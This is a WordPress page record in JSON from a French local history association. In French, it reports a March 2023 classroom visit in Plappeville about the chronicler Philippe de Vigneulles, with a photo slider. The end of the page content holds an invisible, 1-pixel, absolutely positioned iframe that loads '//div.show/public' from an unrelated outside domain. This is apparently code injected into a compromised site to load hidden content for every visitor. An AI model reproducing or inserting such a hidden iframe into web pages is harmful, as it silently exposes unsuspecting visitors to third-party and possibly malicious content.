{"id":6692,"date":"2023-04-13T14:34:06","date_gmt":"2023-04-13T12:34:10","guid":{"rendered":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6692"},"modified":"2023-05-09T08:22:18","modified_gmt":"2023-05-09T06:22:18","slug":"a","status":"publish","type":"page","link":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6692","title":{"rendered":"Intervention en classe \u00e0 Plappeville"},"content":{"rendered":"<h2>23\u00a0mars\u00a02023<\/h2>\n<p>Lorry-l\u00e8s-Metz \u00ab au fil du temps \u00bb a consacr\u00e9 deux apr\u00e8s-midi aux enfants des \u00e9coles de Plappeville pour leur parler de leur illustre voisin lorriot, Philippe de\u00a0Vigneulles. Andr\u00e9 de Pizzol, l\u2019un de nos historiens amateur, passionn\u00e9 par ce chroniqueur, accompagn\u00e9 de V\u00e9ronique Le Ber ont pendant 1 h\u00a015 racont\u00e9 aux \u00e9l\u00e8ves de CM2 puis de CM1 la vie de cet homme et le contexte historique dans lequel il vivait. Les classes ont pos\u00e9 beaucoup de questions int\u00e9ressantes.<\/p>\n<p>Au mois de mai, ces interventions sont pr\u00e9vues aux \u00e9coles de Lorry-l\u00e8s-Metz.<\/p>\n<p>Nous pr\u00e9sentons nos remerciements chaleureux aux institutrices pour leur d\u00e9marche positive et leur accueil.<\/p>\n<div id=\"metaslider-id-6703\" style=\"width: 100%; margin: 0 auto;\" class=\"ml-slider-3-108-0 metaslider metaslider-responsive metaslider-6703 ml-slider has-dots-nav ms-theme-default\" role=\"region\" aria-label=\"Classe Plappeville 1\" data-height=\"600\" data-width=\"800\">\n    <div id=\"metaslider_container_6703\">\n        <ul id='metaslider_6703' class='rslides'>\n            <li aria-roledescription='slide' aria-labelledby='slide-0'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/04\/01.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/04\/01-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6703 slide-6704 msDefaultImage\" title=\"01\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-1'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/04\/02.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/04\/02-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6703 slide-6705 msDefaultImage\" title=\"02\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-2'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/04\/03.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/04\/03-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6703 slide-6706 msDefaultImage\" title=\"03\" \/><\/a><\/li>\n        <\/ul>\n        \n    <\/div>\n<\/div>\n<p>Photos V\u00e9ronique Le Ber<\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6688\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-378\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/retour.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>23\u00a0mars\u00a02023 Lorry-l\u00e8s-Metz \u00ab au fil du temps \u00bb a consacr\u00e9 deux apr\u00e8s-midi aux enfants des \u00e9coles de Plappeville pour leur parler de leur illustre voisin lorriot, Philippe de\u00a0Vigneulles. Andr\u00e9 de Pizzol, l\u2019un de nos historiens amateur, passionn\u00e9 par ce chroniqueur,&hellip; <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6688,"menu_order":6,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-6692","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6692","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6692"}],"version-history":[{"count":9,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6692\/revisions"}],"predecessor-version":[{"id":6873,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6692\/revisions\/6873"}],"up":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6688"}],"wp:attachment":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6692"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}